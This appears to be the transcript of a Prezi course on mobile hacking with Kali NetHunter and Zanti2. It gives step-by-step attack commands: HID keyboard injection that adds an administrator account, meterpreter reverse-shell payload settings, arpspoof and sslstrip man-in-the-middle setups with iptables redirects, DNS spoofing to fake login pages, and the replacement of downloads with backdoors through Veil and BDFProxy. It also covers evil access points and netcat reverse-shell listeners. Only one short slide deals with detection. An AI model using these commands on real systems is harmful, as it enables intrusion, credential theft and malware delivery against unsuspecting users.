Send the link below via email or IMCopy
Present to your audienceStart remote presentation
- Invited audience members will follow you as you navigate and present
- People invited to a presentation do not need a Prezi account
- This link expires 10 minutes after you close the presentation
- A maximum of 30 users can follow your presentation
- Learn more about this feature in our knowledge base article
Transcript of Learn
This attack allows us to execute any command or gain FULL access to any windows computer connected to our android device
How it works?
Once connected, the Android device will trick the computer and pretend to be a keyboard, then it will send a number of commands very quickly to the computer, these commands can be used to run any DOS command or gain full access to the machine using the Powersploit option.
This attack will work even of the autorun feature is disabled as the commands are sent as normal key strokes.
There are two variations of this attack :
I am a keyboard
1. Windows CMD
This will allow us to run windows commands on the target machine.
Just enter the commands you want to run in the "source" box and click on "update" then "Execute".
net user test /add
net localgroup administrators test /add
This will add a user "test" and add it to the administrators group
This will create a server that will give us full access to the target computer.
set PAYLOAD windows/meterpreter/reverse_https
set LHOST [YOUR IP]
set LPORT [PORT]
First of all we need to listen on a certain port for incoming connections so that the target machine can connect back to us.
This can be done from a laptop or from your android device.
Now you need to configure the payload on your android device, set the IP and port values as the same values that you chose in the previous step and leave the URL as it is.
Now all you have to do is click on update and execute.
This is the device that will be used to control the target machine
Discover all connected devices to the network.
Determine the operating system of each device.
Determine the open ports and services running on these ports.
Zanti2 is a free mobile penetration testing framework that allows us to perform a number penetration testing tasks.
In this lesson we will see how to use it to map the network our device is connected to show the connected devices and some basic info about them such as their operating system, IP address, Mac Address and opened ports.
By tapping on any discovered device, we can run a number of advanced scans that display more information about the device.
1. Ping scan/Quick scan/OS detection/Regular Scan : Will not display more than the basic info you get with the basic scan that Zanti performs.
2. Intense Scan: Slower than 1, more detailed info about the opened ports.
3. Slow comprehensive scan: Very Slow, will display more info about the target including filtered ports.
These are just sample scans, you can experiment with the scan options and see the difference between them.
Select target >> scan >> scan type
Spider foot is an open source foot printing tool.It is designed to make the process of information gathering easier, it allows us to gather a lot of information about a domain and creates a nice report at the end with all the gathered info.
>> information gathering >> spiderFoot
Then navigate to 127.0.0.1:5001
Now choose a scan name, enter the target domain, select the data that you want to collect (you can group them by module) and tap "Run Scan".
Once finished tap on the "Brows" tab to see the final report or download it
Network Discovery (War Driving)
Here we will learn how to discover all wi-fi networks within our range and display useful information about them like:
ESSID or network name.
Network MAC address.
We will use an app called wifi analyzer which does all of the above and also features a signal strength meter which can be used to find spots with the strongest signal.
Man In The Middle Attacks
This is one of the most dangerous and effective attacks that can be used, it is used to redirect packets to and from any client to our device, this makes us the "man in the middle" which means we can read/modify/drop these packets.
This is just another method of becoming the MITM (just like the bad USB attack), this attack is more effective and dangerous because it's very hard to protect against it as it exploits the insecure way that ARP works, it also does not require any interaction with the target machine.
How it Works
ARP main security issues:
1. Each ARP request/response is trusted.
2. Clients can accept responses even if they did not send a request.
We will first send an ARP response to the client telling it that “I am the Router”, this done by telling the client that the device with the router ip address has MY MAC address.
IP: Router IP
MAC: Hacker MAC
"I am the router"
Now we will send an ARP response to the router this time telling it that “I am the client”, this done by telling the router that the device with the client ip address has MY MAC address.
IP: Client IP
MAC: Hacker MAC
"I am the client"
This means the router thinks that I am the client, and the client thinks that I am the router. So my device is in the middle of the connection between the client and the router, ie:every packet that is going to/from the client will have to go through my device first.
When we launch a MITM attack, all packets will flow through our device, so we can read all the info sent to/from the target client including URLs, usernames and passwords. We will use Zanti2 to poison the network and read this info.
This enables us to run a html code on any page visited by the target client. This means that we can use html code injection and XSS vulnerabilities against all websites visited by the client, this allows us to do many attacks such as stealing the cookies, but since we can poison the network we can do these attacks in better more reliable ways. This feature is still useful if you want to mess with the client or add a certain code to ALL pages visited by the client
We can also capture files downloaded by the target client, not only that but we can replace them with another file, so when they download a pdf for example we can replace it with a malicious one so that it runs a back door or a key logger on the target machine ! Files are stored in
By tapping on "Logged Images" you will see all the images loaded to the target client, you can also replace all of these images by another one using the "Replace Images" feature.
Websites like facebook,yahoo....ect use HTTPS in their login page, this means that these pages are validated using an SSL certificate and there for will show a warning to the user that the certificate is invalid if the there was a MITM. To bypass this all you have to do is enable the "SSLstrip" feature in Zanti2, this will redirect all requests to HTTPS to HTTP, therefore the client will not see a
This is an implementaiton of the bad USB attack where the phone will pretend to be a network card once plugged into a computer forcing all traffic through the phone. Using any sniffer will allow us to read all packets to/from target machine.
DNS Spoofing allows us to redirect any request to a certain domain to another domain, for example we can redirect any request to facebook.com to a fake acebook page !!
Zanti2 only allows us to redirect ALL requests to a certain domain, therefore I recommend using dnsspoof the same way we used it with the badUSB attack.
Fake Download Attack
Here we will use the same download interception attack we explained in the spying section so that when the target client attempts to download a program it gets replaced with a backdoor.
1. Create a backdoor.
apt-get install veil-evasion #to install veil-evasion
set LHOST [YOUR IP]
2. Listen for connections
set PAYLOAD windows/meterpreter/reverse_http
set LHOST [YOUR IP]
set LPORT [PORT]
3. Run Zanti >> select target client >> MITM >> Intercept Downloads. Select exe for the file type and choose the backdoor we created in step 1.
Note: the fake does not have to be a backdoor, it can be any file such as a keylogger/virus ...etc.
The Backdoor Factory Proxy is a proxy that will patch binaries with a backdoor during download, so any binary downloaded by the target client will be converted to a backdoor while maintaining the binary's functionality.
DBFProxy can be used with a fake access point or with a normal access point if we can MITM it.
1. Configure shell code settings
> nano /etc/bdfproxy/bdfproxy.cfg
Note: HOST is the ip of the device that the client will connect to (ie: the one that will be listening for connections).
2. Start BDFProxy
> iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
3. ARP Poison the target (no need to do this with Mana)
4. Start Metarsploit to listen for connections.
> /etc/init.d/postgresql start
> /etc/init.d/metasploit start
> msfconsole -r /usr/share/bdfproxy/bdf_proxy_msf_resource.rc
Evil Access Point
In this section we will learn how to create an access point, so that others can connect it to access the internet.
This is no ordinary access point because we will automatically be the man in the middle as all data will be sent to us because we are the server, this means that we will be able to capture all credentials entered by clients, modify packets ... etc.
In this section we will learn how to prepare our device for penetration testing.
1. Install device drivers on computer.
2. Unlock the device.
3. Root it, this will basically install a root user on the device. Root user is a user that can have full permission on the deive, this is very important to have full control over the device.
4. Install NetHunter; this is an operating system designed for penetration testing using android devices.
Only nexus devices and One Plus are officially supported at the moment, but there are un-official releases for other devices. The installation process is the same for all officially supported devices
This is the main menu of NetHunter, this menu gives us access to all of the features of NetHunter, it also gives access to the main or most powerful attacks that can be launched using NetHunter
We will explain all of these tools and attacks in detail in the coming lectures.
1. Download flushiptables.sh file in /sdcard/files
2. Go to Kali Launcher >> Launch Shell in Terminal
> cd /sdcard/files
#change working directory to /sdcard/files
> bash flushiptables.sh
> bash startbadusb-kitkat.sh
> bash startbadusb-lollipop.sh
Now all the requests/responses sent to/from the target machine will flow through our deivce, this makes us the Man In The Midle (MITM - hence the attack name), this means we can read and modify all data sent to/from target device !
Detecting Undetectable Backdoors
Check properties of the file.
Is it what it seems to be?
Run the file in a virtual machine and check resources.
Use an online Sandbox service.
Now that all the data is flowing is through our device, all we have to do is store it in a file and read it later!
We will use a tool called tshark to do this.
> tshark -i rndis0 -w capture-file.log
#This will store captured data in capture-file.log
Now we can open this file using any packet analyzer, I prefere Wireshark
Websites like hotmail, yahoo....etc use HTTPS in their login page, this means that these pages are validated using an SSL certificate and therefor will show a warning to the user that the certificate is invalid if the there was a MITM. To bypass this
we will use a tool calld sslstrip, this tool will downgrade https connections to http.
> iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
> sslstrip -p
Arpspoof is a tool part of a suit called dsniff, which contains a number of network penetration tools. Arpspoof can be used to poison the network and redirect traffic to flow through our device.
1. Tell the target client that I am the router.
> arpspoof -i [interface] -t [Target IP] [AP IP]
> arpspoof -i wlan0 -t 192.168.1.5 192.168.1.1 #Example
2. Tell the AP that I am the target client.
> arpspoof -i [interface] -t [AP IP] [Target IP]
> arpspoof -i wlan0 -t 192.168.1.1 192.168.1.5
3. Enable IP forward to allow packets to flow through our device without being dropped.
> echo 1 > /proc/sys/net/ipv4/ip_forward
DNS Spoofing allows us to redirect any request to a domain to another domain, for example we can redirect any request to facebook.com to a fake acebook page !!
We will use a tool called dnsspoof to do this.
1. create a dnsspoof config file.
2. run dnspsoof
> dnsspoof -i rndis0 -f /path/to/config/file
We simply do this by creating a hot spot and then sniff/modify data the same way we did with the badUSB attack.
Mana-toolkit however makes the whole process much simpler, it automatically creates a new AP and starts sslstrip/firelamp and even attempts to bypass HSTS which is used by Gmail and Facebook.
Another cool feature in Mana is that it allows us to tether the connection from one wireless card to another instead of limiting us to using 3G.
Mana has 3 main start scripts:
1. start-noupstream: starts an AP with NO internet connection.
2. start-nat-simple: this starts a regular AP using internet connection in the upstream interface.
3. start-nat-full: starts AP with internet connection, it also starts sslstrip,sslsplit, firelamp and attempts to bypass HSTS.
To start a script run:
> bash /usr/share/mana-toolkit/run-mana/script-name.sh
The captured traffic will be in /var/lib/mana-toolkit
HID Ducky Scripts
This menu allow us to write our own HID keyboard attacks.
We first need to write it as a rubber ducky script and then it can convert it to HID attack format for us.
Alternatively you can use any existing rubber ducky script or use the payload generator to make one.
PS: links for the payload generator and rubber ducky script writing are in the resources menu on the right.
Download & Execute
Here we will use a simple script that will download a file and execute it.
This is really useful because this means we can run ANY file we want only by connecting our android device to a computer, this file can be a backdoor, virus, keylogger ...etc.
The HID Keyboard attacks work on ALL operating systems including OSX, so today we will use a simple script to gain full access to any OSX machine once its connected to our Android device via USB.
This script will send a connection to a certain IP address, you need to use a tool called net cat to recieve this connection. Netcat is pre installed in NetHunter and in Kali linux, it can also be installed on windows.
Run the following command to listen for incoming connections:
PS the script is in the resources menu on the right
nc -vv -l -p [PORT]
We can use the exact same script that we used with OSX to get a shell on any linux device, the only thing that we need to change is how to laumch the terminal, in Ubuntu distros for example its alt+F2.
Cracking Wi-Fi Keys
NetHunter comes with aircrack-ng suit and reaver pre-installed, these two suits are all you need to crack Wi-Fi keys weather its a WEP/WPA or WPA2.
The process of cracking these keys is the same weather it's done from a PC or from an Android device because the programs used are the same, therefore to avoid going off topic I will not explain how to crack Wi-Fi keys, however I have a full course explaining multiple attacks against each encryption, so if you are interested into taking it just message me and I will give it to you for $10 only.
To do this you need a powerful wireless card that supports monitor mode and packet injection, an example of this card is Alfa awus36.
These external wireless cards connect through USB, so you will need an OTG Y cable to use it.